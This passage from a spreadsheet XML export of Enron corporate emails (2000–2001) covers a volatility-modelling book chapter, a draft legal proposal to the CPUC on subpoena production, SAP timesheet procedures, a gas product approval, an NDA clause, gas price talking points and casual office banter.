rd and respect for the Government Affairs group and for each individual  ha=_x000D_
s been validated many times over  during the past nine days. Thank you very=_x000D_
 much.--- Rick Shapiro_x000D_
.                                               </t>
  </si>
  <si>
    <t>Thu, 29 Jun 2000 13:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris@lacima.co.uk'})</t>
  </si>
  <si>
    <t>frozenset({'vince.j.kaminski@enron.com', 'grant.masson.@enron.com'})</t>
  </si>
  <si>
    <t>Re: chapter 3 revisions</t>
  </si>
  <si>
    <t>Dear Vince and Grant,_x000D_
_x000D_
Please find attached our butchering of your work (only joking...). We've_x000D_
tied the chapter in with what has gone before and changed some of your_x000D_
notation so that it is consistent with ours._x000D_
_x000D_
Vince; could you please send thru the footnotes referred to in the chapter_x000D_
at your convenience. Could you also please supply a full reference for_x000D_
Routledge, Seppi, Spatt (1999)._x000D_
_x000D_
Grant; I hope you don't mind we've called PDJD just JD (to fit in more with_x000D_
our work). Please also can you supply the last figure before you disappear!_x000D_
_x000D_
Do you want us to write the summary?_x000D_
_x000D_
Many thanks again for all your efforts. It's all looking good._x000D_
_x000D_
Best regards._x000D_
_x000D_
Chris._x000D_
_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: Grant Masson &lt;Grant.Masson.ECT@enron.com&gt;_x000D_
To: Chris Strickland &lt;chris_strickland@compuserve.com&gt;_x000D_
Sent: Tuesday, June 27, 2000 8:54 AM_x000D_
Subject: Re: chapter 3 revisions_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Chris:_x000D_
&gt;_x000D_
&gt; I can't decide if I should take your silence over the past several weeks_x000D_
to mean_x000D_
&gt; that you are getting stuck into finishing up the book or you are just so_x000D_
&gt; thoroughly disgusted with our work that you would like to wash your hands_x000D_
of us._x000D_
&gt;_x000D_
&gt; I've been stuck on trying to get the last figure mentioned in the chapter_x000D_
into a_x000D_
&gt; format that I like.  The problem is the volatility found in the_x000D_
regressions is_x000D_
&gt; on the order of several hundred percent, and so when I plot the historical_x000D_
data_x000D_
&gt; next to a simulated curve over the course of the year, the simulated curve_x000D_
tends_x000D_
&gt; to drift up or down stupidly both in the Jump diffusion and Garch+Jump_x000D_
diffusion_x000D_
&gt; model.  Any suggestions would be accepted with pleasure. I wonder if I_x000D_
should_x000D_
&gt; skip the figure.  It seems a pity to do so however, because otherwise the_x000D_
last_x000D_
&gt; section comes off as a bit of an afterthought, and I would like to present_x000D_
a_x000D_
&gt; practical example.  Again any guidance would be appreciated._x000D_
&gt;_x000D_
&gt; Anyway, I am sending you a somewhat improved draft now (minus only the_x000D_
last_x000D_
&gt; figure), rather than sit on the whole thing while I stew on this bit,   I_x000D_
hope_x000D_
&gt; this will be useful to you.  Because I am leaving for holidays at the end_x000D_
of the_x000D_
&gt; week, I can guarantee you that you will have a final draft before then._x000D_
&gt;_x000D_
&gt; Regards,_x000D_
&gt; Grant._x000D_
&gt; (See attached file: cs260600.doc)_x000D_
&gt;_x000D_
_x000D_
 - ED_c03_volatility.zip</t>
  </si>
  <si>
    <t>Fri, 6 Oct 2000 02:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Revised Draft Proposal to CPUC</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Richard B Sanders/HOU/ECT on 10/06/2000 09:41 AM -----_x000D_
_x000D_
	"Fergus, Gary S." &lt;GFergus@brobeck.com&gt;_x000D_
	10/05/2000 09:33 PM_x000D_
		 _x000D_
		 To: "'Richard.B.Sanders@enron.com'" &lt;Richard.B.Sanders@enron.com&gt;, _x000D_
"'msmith1@enron.com'" &lt;msmith1@enron.com&gt;, "'David_Aamodt@pgn.com'" _x000D_
&lt;David_Aamodt@pgn.com&gt;, "MBD" &lt;MDay@GMSSR.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Revised Draft Proposal to CPUC_x000D_
_x000D_
_x000D_
PRIVILEGED AND CONFIDENTIAL_x000D_
ATTORNEY CLIENT PRIVILEGE_x000D_
_x000D_
_x000D_
DRAFT DRAFT DRAFT_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Harvey Morris Esq._x000D_
California Public Utilities Commission_x000D_
505 Public Utilities Commission_x000D_
San Francisco, California   94102_x000D_
_x000D_
  Re:   I.00-08-002  Subpoenas Served on Enron Power_x000D_
Marketing, Inc. ("EPMI"), Enron Energy Services Inc. ("EES"), Enron Energy_x000D_
Marketing Corporation ("EEMC"), Enron Energy Services Operations Inc. (EESO)_x000D_
and Portland General Electric Corporation ("Portland General")(collectively_x000D_
sometimes referred to as the "Enron Entities")_x000D_
_x000D_
Harvey,_x000D_
_x000D_
 Here are our proposals with respect to the Enron Entities'_x000D_
production of documents pursuant to the above described subpoenas issued by_x000D_
the California Public Utility Commission (hereinafter "the Commission")._x000D_
The Enron Entities are willing to assist the Commission in undertaking its_x000D_
investigation into the problems in the California electric markets by_x000D_
producing a limited quantity of specified information on a timely basis.  We_x000D_
believe that the limited production we propose will enable the Commission to_x000D_
commence its investigation much sooner than if the parties were forced to_x000D_
litigate all of the potential objections to the requests for production,_x000D_
which are, by any standard, extremely broad and could involve millions of_x000D_
pages of documents.  We make these proposals pursuant to our email exchange_x000D_
of October 3, 2000 with the understanding that the Commission agrees that by_x000D_
cooperating, offering to produce or producing documents, the Enron Entities_x000D_
have not waived any objections or challenges to these subpoenas whatsoever_x000D_
and that any claims, defenses, objections, jurisdictional or otherwise or_x000D_
other responses have been specifically reserved and can be raised in the_x000D_
future, if necessary.   For all of these proposals, we exclude documents_x000D_
that are protected from disclosure by the attorney client and attorney work_x000D_
product privileges._x000D_
_x000D_
 [SUBJECT TO VERIFICATION:  Generally speaking, the documents and_x000D_
information that the Commission seeks can be found, if they exist, within_x000D_
EPMI, EES and Portland General.  To the extent that EEMC or EESO are_x000D_
relevant to the Commission's investigation, any documents would be located_x000D_
within EES.  Thus, we do not anticipate specific document productions from_x000D_
either EEMC or EESO.]_x000D_
_x000D_
GENERAL DOCUMENTS_x000D_
Requests 1 through 4_x000D_
_x000D_
 The Enron Entities have been very dynamic organizations having_x000D_
acquired, sold, divested, joint ventured, spun off and otherwise reorganized_x000D_
themselves extensively during the past two years.  The burden and expense on_x000D_
Enron to locate, and produce every corporate organizational chart anywhere_x000D_
in its organization since April 1, 1998 is significant.   The Enron entities_x000D_
will provide the Commission with exemplars of its current organizational_x000D_
charts, telephone directories and so called "family trees" to show its_x000D_
current organization.  To the extent that Enron can readily identify and_x000D_
locate exemplars of significant organizational charts, telephone directories_x000D_
or so called "family trees" for earlier periods it will also make those_x000D_
available.  One Enron Entity, Portland General, has published books on its_x000D_
corporate history.  If a list of those books would be helpful, we can_x000D_
provide it.  With respect to the other entities, to the extent that_x000D_
corporate histories can be found, they will be produced.  We anticipate_x000D_
producing these documents in the first wave on October 13, 2000._x000D_
_x000D_
Requests 5 and 6_x000D_
_x000D_
 The Enron Entities propose that their responses to Requests 1-4 will_x000D_
identify their relationship to affiliated companies and the Transaction_x000D_
Documents will identify its customers and suppliers._x000D_
_x000D_
FINANCIAL DOCUMENTS_x000D_
Requests 7 through 11_x000D_
_x000D_
 The Enron Entities will produce their public filings for the period_x000D_
requested with respect to financial data.  EPMI, EES, and Portland General_x000D_
will provide to the Commission electronic Transaction Documents for the_x000D_
purchase and sale of energy delivered which includes economic data.   It is_x000D_
intended that this economic data will provide the Commission with financial_x000D_
information regarding the Enron Entities which will be useful to its_x000D_
investigation.   We anticipate producing public filings regarding financial_x000D_
data on October 13, 2000 and the electronic Transaction Documents in the_x000D_
second wave of document productions._x000D_
_x000D_
GENERATING DOCUMENTS_x000D_
Requests 12, 14 and 18_x000D_
_x000D_
 For the Enron Entities other than Portland General, the generation_x000D_
facilities are limited in number and there will probably be limited_x000D_
documents available.  The Enron Entities to the extent they act as a_x000D_
scheduling coordinator or possessed the right to use or resell generation_x000D_
output, do not have the specific documents that pertain to each generation_x000D_
unit requested.  The Enron Entities, other than Portland General, do have_x000D_
documents and information for Enron Wind, Saguaro and Las Vegas_x000D_
Cogeneration.  We propose to produce these documents in the second wave of_x000D_
document productions._x000D_
_x000D_
  For Portland General, the production of the requested documents_x000D_
would involve a tremendous volume of documents, as Portland General owned_x000D_
twenty generating facilities of a variety of types and sizes during 2000._x000D_
Portland General is a net importer of energy and can only generate about one_x000D_
half of its total energy demand.  As a result, we question whether the_x000D_
effort required of Portland General is warranted as its impact on the_x000D_
California wholesale market is necessarily limited.  In addition, those_x000D_
transactions which do involve Portland General sales into California are_x000D_
limited to sales to the ISO and PX, and long term contracts with two small_x000D_
California municipal utilities.  Thus, the Commission will receive the_x000D_
essential transactional information regarding these sales from the ISO and_x000D_
PX.  Nevertheless, Portland General proposes to provide for year 2000_x000D_
electronic Transaction Documents in summary form similar to the data being_x000D_
provided by other Enron Entities, to the extent relevant.  [We propose that_x000D_
the Commission defer requesting production of other information until it has_x000D_
reviewed the information of generators who sell a significant proportion of_x000D_
their energy into the California market.  At that time a more accurate_x000D_
assessment can be made of whether this enormous effort will be valuable_x000D_
given the limited impact of Portland General generation on the California_x000D_
wholesale market.]_x000D_
_x000D_
[Alternate ending to paragraph:   We propose for the voluminous Portland_x000D_
General generating cost and maintenance data, that these documents be made_x000D_
available in Portland for inspection from a representative sampling of_x000D_
facilities.  If there are specific documents that the Commission would like_x000D_
copied from that production, we can discuss the arrangements for producing_x000D_
these documents.  We propose to make these documents available in Portland_x000D_
in a third wave of document productions]_x000D_
_x000D_
TRANSACTION DOCUMENTS_x000D_
Requests 13, 15, 16, 17 and 19_x000D_
_x000D_
 We understand that the Commission will be obtaining trading data for_x000D_
the purchase and sale of energy delivered in California from the ISO and PX._x000D_
EPMI can provide the Commission several different sets of transaction data_x000D_
for year 2000 (in California and outside of California and Real Time) for_x000D_
the purchase and sale of energy delivered with the date, counterparty,_x000D_
quantity, delivery point, hours, price, and whether it is a purchase or a_x000D_
sale.   Because of the speed with which you want this information, it is_x000D_
possible that some entries will be incomplete or inaccurate.  For those_x000D_
transactions where EPMI served only as the scheduling coordinator, we_x000D_
understand that the ISO will show part of the transaction, but there will_x000D_
not be a corresponding transaction in the EPMI data we can provide quickly._x000D_
The reason is that this type of transaction is passed through to EPMI's_x000D_
customer on an accounting system rather than as part of the trading_x000D_
business.  EES is a retail provider of electricity, and plays a far more_x000D_
limited role in the wholesale markets which are the subject of the_x000D_
Commission investigation.  However, EES can also provide similar electronic_x000D_
Transaction Data with the proviso that it will not include the specific_x000D_
names of its retail customers but instead will provide a blind customer_x000D_
number.  This additional restriction is important to EES because many of_x000D_
EES's customers have agreements whereby they must be notified of any_x000D_
subpoena and provided an opportunity to object.  EES cannot meet your time_x000D_
frame to release information and give its customers the notice they require._x000D_
Given that EES was a retail provider and the fact that the identity of_x000D_
retail customers is of little or no relevance to the functioning of the_x000D_
wholesale market, we do not believe protecting the identity of retail_x000D_
customers is an unreasonable limitation or narrowing of the request.  We_x000D_
anticipate producing the transaction data in the second wave of document_x000D_
productions._x000D_
_x000D_
FERC DOCUMENTS_x000D_
_x000D_
Request 20_x000D_
_x000D_
 The Enron Entities will produce the requests for data they received_x000D_
from FERC and to the extent that FERC has been given responses, copies of_x000D_
those responses.  We anticipate producing the FERC documents on October 13,_x000D_
2000._x000D_
_x000D_
_x000D_
 Based upon discussions that we have had with the various Enron_x000D_
Entities, we believe that we could make a second wave of productions on_x000D_
Friday October 27, 2000.  It is possible that not all Enron Entities could_x000D_
make that date but we believe the bulk of the data could be available for_x000D_
production by then._x000D_
_x000D_
 We propose to make these productions with the understanding that if_x000D_
any entity obtains a more stringent protective order than the one currently_x000D_
in place, that all of the Enron Entities document productions will be_x000D_
protected by the most stringent protective order.  In addition, if, at the_x000D_
request of any party or nonparty to this proceeding, the Commission or a_x000D_
court of competent jurisdiction orders that the requests for production be_x000D_
limited, reduced or eliminated, the Enron Entities reserve the right to_x000D_
limit the production of documents in conformance with such order._x000D_
_x000D_
 We understand that you will consider these proposals and let us know_x000D_
if they are acceptable to the Commission.  If you have any questions or_x000D_
comments about our proposal, please do not hesitate to contact Michael Day_x000D_
or myself._x000D_
_x000D_
Brobeck Phleger &amp; Harrison LLP_x000D_
_x000D_
Gary Fergus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Fri, 23 Jun 2000 01:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vasant.shanbhogue@enron.com', 'pinnamaneni.krishnarao@enron.com', 'zimin.lu@enron.com', 'clayton.vernon@enron.com', 'martin.lin@enron.com', 'kevin.moore@enron.com', 'patricia.tlapek@enron.com', 'jose.marquez@enron.com', 'tanya.tamarchenko@enron.com', 'elena.chilkina@enron.com', 'guiseppe.paleologo@enron.com', 'kevin.kindall@enron.com', 'alex.huang@enron.com', 'amitava.dhar@enron.com', 'alexios.kollaros@enron.com', 'vincent.tang@enron.com', 'maureen.raymond@enron.com', 'paulo.issler@enron.com', 'joseph.hrgovcic@enron.com', 'samer.takriti@enron.com', 'cantekin.dincerler@enron.com', 'stinson.gibner@enron.com', 'grant.masson@enron.com', 'sevil.yaman@enron.com', 'farouk.lalji@enron.com', 'shalesh.ganjoo@enron.com', 'datren.williams@enron.com', 'gwyn.koepke@enron.com', 'eloise.meza@enron.com', 'mike.roberts@enron.com', 'ainsley.gaddis@enron.com', 'tom.halliburton@enron.com', 'william.smith@enron.com', 'bob.lee@enron.com', 'vince.kaminski@enron.com', 'yanna.crystal@enron.com', 'chonawee.supatgiat@enron.com', 'sofya.tamarchenko@enron.com', 'brad.aimone@enron.com', 'osman.sezgen@enron.com'})</t>
  </si>
  <si>
    <t>New TimeSheet Procedures</t>
  </si>
  <si>
    <t xml:space="preserve">Hello everyone:_x000D_
=20_x000D_
Just when you get used to something it changes!_x000D_
_x000D_
As you may have heard, Enron is implementing a new time entry system as par=_x000D_
t=20_x000D_
of the July 1 SAP implementation.  Time entry for the June 16th- 30th perio=_x000D_
d=20_x000D_
must be entered into SAP by 3:00 pm CST on June 30th.  As your Timekeeper, =_x000D_
I=20_x000D_
will assist with this process and ensure that we meet this very important=_x000D_
=20_x000D_
deadline._x000D_
_x000D_
I will continue to do the time sheets for the 19th floor and for Osman and=_x000D_
=20_x000D_
Samer._x000D_
_x000D_
Sam Smith and/or Kevin Moore will be responsible for the timesheets for the=_x000D_
=20_x000D_
weather group on the 32nd Floor. =20_x000D_
_x000D_
Time can be entered in SAP in two ways:_x000D_
? you can enter your time yourself using the new eHRonline feature; or,=20_x000D_
? timekeepers can enter time on your behalf. =20_x000D_
_x000D_
If you are unsure as to which approach you should use, please call me. =20_x000D_
Please remember that all time for this period must be submitted before 3:00=_x000D_
=20_x000D_
pm CST, on June 30th._x000D_
_x000D_
For those of you using eHRonline:_x000D_
First of all, congratulations on taking this next step toward Enron=01,s vi=_x000D_
sion=20_x000D_
of empowering the employee.  By using the new eHRonline feature, you are=20_x000D_
helping Enron to realize the value in this SAP implementation.  Hopefully,=_x000D_
=20_x000D_
you too, will receive value from having instant access to your personal=20_x000D_
information._x000D_
_x000D_
The new eHRonline functionality is:_x000D_
? easy to use_x000D_
? accessible through the Enron intranet at eHRonline.enron.com_x000D_
_x000D_
Using this feature, you can not only enter your own time, but also maintain=_x000D_
:_x000D_
? your profile information (skills, education, and experience)_x000D_
? home address_x000D_
? phone numbers_x000D_
? W-4 changes_x000D_
? emergency contact information_x000D_
_x000D_
Additionally, you will be able to view your individual pay advice and benef=_x000D_
it=20_x000D_
elections._x000D_
_x000D_
You will receive your personal ID and password via e-mail from SAP_Security=_x000D_
=20_x000D_
by June 22nd.  Because of the confidentiality of the information accessible=_x000D_
=20_x000D_
using eHRonline, it is important that you keep your ID and password=20_x000D_
confidential.  If you do not receive your information by the end of the day=_x000D_
=20_x000D_
on June 22nd, please call the COE at (713) 345-4SAP to obtain your ID and=_x000D_
=20_x000D_
password._x000D_
_x000D_
The Apollo &amp; Beyond team has teamed with EBS to deliver training on how to=_x000D_
=20_x000D_
enter time using eHRonline via EBS=01, new product EnronCast.  This tool is=_x000D_
=20_x000D_
available to you on your desktop.  You can access EnronCast at=20_x000D_
www.enroncast.com and follow the instructions._x000D_
_x000D_
STEP BY STEP GUIDES - http://sap.enron.com/coe_x000D_
? ENTER TIME VIA EHRONLINE (EMPLOYEE) STEP BY STEP PROCEDURE_x000D_
? CORRECT TIME VIA EHRONLINE (EMPLOYEE) STEP BY STEP PROCEDURE_x000D_
? ENTER TIME VIA EHRONLINE (NON-EMPLOYEE CONTRACTOR) STEP BY STEP PROCEDURE_x000D_
? CORRECT TIME VIA EHRONLINE (NON-EMPLOYEE CONTRACTOR) STEP BY STEP PROCEDU=_x000D_
RE]_x000D_
_x000D_
For those of you who need me to enter your time:_x000D_
Attached is a manual time entry form that I must have completed and returne=_x000D_
d=20_x000D_
by June 28th.  Please estimate the last two days of the period as accuratel=_x000D_
y=20_x000D_
as possible.  If necessary, I can make corrections on the next time entry=_x000D_
=20_x000D_
period.  If you do not want to use this form, I will have hard copies at my=_x000D_
=20_x000D_
desk and will be glad to help you fill them_x000D_
out.  I know this is creating more work for everyone, but what can I say?_x000D_
_x000D_
_x000D_
_x000D_
Where can you get help?_x000D_
I am here to help you with the new coding necessary on your timesheet.  Als=_x000D_
o,=20_x000D_
if you do not know which Absence or Attendance Type you should use, please=_x000D_
=20_x000D_
come see me or give me a call._x000D_
_x000D_
If you have other questions or are experiencing problems, you can also get=_x000D_
=20_x000D_
help from any of the following places:_x000D_
_x000D_
Center of Expertise (COE)_x000D_
The Center of Expertise can help answer many of your questions and provide=_x000D_
=20_x000D_
you with assistance if you are experiencing problems.  The COE is available=_x000D_
=20_x000D_
24 hours a day from Monday at 7:00 am CST through Friday at 7:00 pm CST.  Y=_x000D_
ou=20_x000D_
can contact the COE at (713) 345-4SAP._x000D_
_x000D_
Dedicated Support Personnel_x000D_
During the time period right after the initial =01&amp;go live=018 the project =_x000D_
team has=20_x000D_
dedicated additional resources to help support you.  These resources can be=_x000D_
=20_x000D_
contacted at:_x000D_
_x000D_
Marla Hernandez at x 39763 for now and after 6/22 at x31645 at workstation =_x000D_
#=20_x000D_
EB3661B_x000D_
Mark Timmons at 57919 for now, pager number 888-620-3896, at workstation #=_x000D_
=20_x000D_
EB3667A_x000D_
_x000D_
Regards,_x000D_
_x000D_
Shirley_x000D_
3-5290_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 07:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: US Gas Phy Index Firm 10-day Flexible non-TX&gt;1Mo&lt;1Yr - Approval_x000D_
 Required!</t>
  </si>
  <si>
    <t xml:space="preserve">OK for me._x000D_
_x000D_
_x000D_
_x000D_
	Lisa Lees_x000D_
	11/07/2000 03:20 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT_x000D_
		 cc: Stacey Richardson/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT_x000D_
		 Subject: US Gas Phy Index Firm 10-day Flexible non-TX&gt;1Mo&lt;1Yr - Approval _x000D_
Required!_x000D_
_x000D_
Tana/Karen:_x000D_
_x000D_
The product long description below will fall under the new product type US _x000D_
Gas Phy Index Firm 10-day Flexible non-TX&gt;1Mo&lt;1Yr.  Credit (Tom Moran) has _x000D_
approved copying the profiles for the new product type from the following:_x000D_
_x000D_
US Gas Phy Index Firm non-TX&gt;1Mo&lt;1Yr_x000D_
_x000D_
Please respond by 10 a.m. on Wednesday, November 8._x000D_
_x000D_
Thank you._x000D_
---------------------- Forwarded by Lisa Lees/HOU/ECT on 11/07/2000 02:15 PM _x000D_
---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Melba Lozano                                                           _x000D_
  11/01/2000 04:56 PM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Mark Taylor/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Bjorn _x000D_
Hagelmann/HOU/ECT@ECT, Stephen H Douglas/HOU/ECT@ECT, Jeff _x000D_
Blumenthal/HOU/ECT@ECT_x000D_
cc: Lisa Lees/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Robert B _x000D_
Cass/HOU/ECT@ECT _x000D_
Subject: US Gas Phy Index Firm 10-day Flexible non-TX&gt;1Mo&lt;1Yr - Approval _x000D_
Required!_x000D_
_x000D_
Your review and approval of the following product type in the EOL Datamanager _x000D_
is needed. This product already exists for products less than 1month.  _x000D_
_x000D_
Mark:  Stacey Dickson has already approved this language._x000D_
_x000D_
US Gas Phy Index Firm 10-day Flexible non-TX&gt;1Mo&lt;1Yr_x000D_
_x000D_
_x000D_
EXAMPLE:_x000D_
_x000D_
A US Gas Transaction with Enron North America Corp. (ENA), under which (A) _x000D_
where ENA is the Buyer,  ENA shall deliver to Counterparty and Counterparty  _x000D_
shall receive a quantity of natural gas equal to the volume submitted by the _x000D_
Counterparty via the website for delivery on each day during the Period of _x000D_
Delivery (the sum of the daily volumes shall equal the 'Total Volume'), and _x000D_
Counterparty shall deliver to ENA and ENA shall receive a quantity of natural _x000D_
gas for delivery on each of the Purchase Dates during a calendar month, where _x000D_
(i) the volume of gas delivered on any Purchase Date shall not exceed 10 _x000D_
percent of the Total Volume for that calendar month and (ii) the volume  of _x000D_
gas delivered on all Purchase Dates shall be in increments such that that the _x000D_
sum of said increments equals the Total Volume for that calendar month, or  _x000D_
(B) where ENA is the Seller,  Counterparty shall deliver to ENA  and ENA  _x000D_
shall receive a quantity of natural gas equal to the volume submitted by the _x000D_
Counterparty via the website for delivery on each day during the Period of _x000D_
Delivery (the 'Total Volume'), and ENA shall deliver to Counterparty and _x000D_
Counterparty shall receive a quantity of natural gas for delivery on each of _x000D_
the Purchase Dates during a calendar month, where the volume of gas delivered _x000D_
on any Purchase Date shall not exceed 10 percent of the Total Volume for that _x000D_
calendar month and the volume of gas delivered on all Purchase Dates shall be _x000D_
in increments such that that the sum of said increments equals the Total _x000D_
Volume for that calendar month. All deliveries shall be on a firm basis._x000D_
_x000D_
The Contract Price shall be the price derived from the Index for that _x000D_
calendar month, as adjusted by the price submitted by the Counterparty via _x000D_
the website. The Buyer shall pay the Contract price for each calendar month _x000D_
during the Period  for gas received. The Seller shall pay the Index for each _x000D_
calendar month for gas received._x000D_
_x000D_
The term of the Transaction shall be from the Effective Date of __ ___ 2000 _x000D_
to the Termination Date of __  ____ 2000._x000D_
_x000D_
The transaction is for delivery at Columbia, Appalachian. The Period of _x000D_
Delivery shall be from the effective date through the termination date. The _x000D_
Purchase Dates shall be each of no less than ten days as designated by Buyer _x000D_
within each calendar month during the Period of Delivery. Buyer shall notify _x000D_
Seller by facsimile of Buyer's designation of a Purchase Date by no later _x000D_
than 10:45 a.m. Central Prevailing Time on the due date of the pipeline _x000D_
nomination for the day on which Buyer desires the gas to flow._x000D_
_x000D_
The Index for each calendar month shall be the Columbia Gas Transmission _x000D_
Corp., Appalachia (W. Va., Ohio, Ky.) price as listed in the section entitled _x000D_
"Prices of Spot Gas Delivered to Pipelines", published in the first issue in _x000D_
such month of Inside Ferc's Gas Market Report._x000D_
_x000D_
The price is quoted in US Dollars per unit of volume, which will be the _x000D_
Contractual Currency._x000D_
_x000D_
The unit of measure against which the price is quoted shall be millions of _x000D_
British thermal units and the quantity shown shall be in millions of BTUs per _x000D_
day._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 02:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.metts@enron.com', 'lance.schuler-legal@enron.com', 'greg.piper@enron.com'})</t>
  </si>
  <si>
    <t>BEA Systems Inc.</t>
  </si>
  <si>
    <t>Gentlemen -_x000D_
_x000D_
We are working on a non-disclosure agreement with BEA Systems Inc., a _x000D_
software company.  The basis for the NDA is the disclosure to BEA of the EOL _x000D_
software and discussions concerning a possible transaction involving either _x000D_
the purchase or long term license of the software.  This possible transaction _x000D_
is in association with an ongoing project by ENW involving the EOL software._x000D_
_x000D_
The original NDA provided to BEA contained a unilateral non-solicitation _x000D_
provision.  BEA responded with a bilateral provision that sought to reach _x000D_
beyond BEA and ENW.  I have provided the attached language to BEA for their _x000D_
review.  They have subsequently approved the language.  _x000D_
_x000D_
Basically, the attached is our standard non-solicitation provision, but has, _x000D_
as a caveat, a statement that the non-solicitation is only applicable to BEA _x000D_
and ENW, and not affiliates/subsidiaries or parent companies._x000D_
_x000D_
At your convenience, please let me know if the attached is acceptable for the _x000D_
BEA non-disclosure agreement._x000D_
_x000D_
If any of you should have any questions, please do not hesitate to call me._x000D_
_x000D_
_x000D_
_x000D_
Mark_x000D_
Senior Counsel, EWS_x000D_
Phone:     713-345-8897_x000D_
Facsimile: 713-646-3490_x000D_
E-Mail:      Mark.Greenberg@enron.com</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 02:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'susan.scott@enron.com', 'christine.stokes@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'michelle.lokay@enron.com', 'steven.harris@enron.com', 'lindy.donoho@enron.com'})</t>
  </si>
  <si>
    <t>More info on higher gas prices</t>
  </si>
  <si>
    <t>Enron talking points...._x000D_
_x000D_
_x000D_
Factors Leading to Higher Natural Gas Prices this Winter_x000D_
_x000D_
? Demand for natural gas has increased mainly due to consumption in the power _x000D_
generation market and strength of the manufacturing sector in a booming _x000D_
economy._x000D_
_x000D_
? Natural gas production and drilling has fallen off since 1998 due to low _x000D_
prices that reached far below $2 per MMBtu.  In 2000, deliverability _x000D_
utilization will be over 95 percent._x000D_
_x000D_
? While drilling activity has risen sharply (as much as 50% from last year), _x000D_
the production from this increased drilling activity typically is not _x000D_
available for several months.  According to the AGA, supply production _x000D_
continues to run 16% below last year's levels._x000D_
_x000D_
? The past three winters have been "warmer than normal" winters in the _x000D_
Midwest and much of the United States and Canada, artificially masking the _x000D_
usual consumption of natural gas under "normal" weather situations. _x000D_
_x000D_
? Very warm weather during this summer has caused a significant demand _x000D_
increase for natural gas in the electricity generation sector thereby _x000D_
competing for gas storage injections in the marketplace and driving prices _x000D_
upward._x000D_
_x000D_
? U.S. storage inventory levels are lower than historical average levels from _x000D_
the past six years, according to the AGA.  The cost of storage inventory at _x000D_
this summer's strong prices could eliminate the price advantage traditionally _x000D_
experienced in the winter._x000D_
_x000D_
? Other heating fuels like propane and heating oil are also showing _x000D_
significantly higher prices and potentially lower stocks this winter than _x000D_
last.</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 10:08:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>Yes it is_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 12:08 PM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
not fair_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 12:04 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
because I said so_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 12:04 PM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
how_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 12:00 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
yes it is_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 12:00 PM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
thats not a hint_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 11:59 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
you'll get it _x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 11:56 AM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
how about a hint_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 11:45 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
You never know! _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 11:45 AM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
as in hours days or weeks?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 11:34 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
very soon_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 11:33 AM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
when do I get it_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 11:27 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
I have it_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 11:22 AM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
by the way where is my present_x000D_
_x000D_
 -----Original Message-----_x000D_
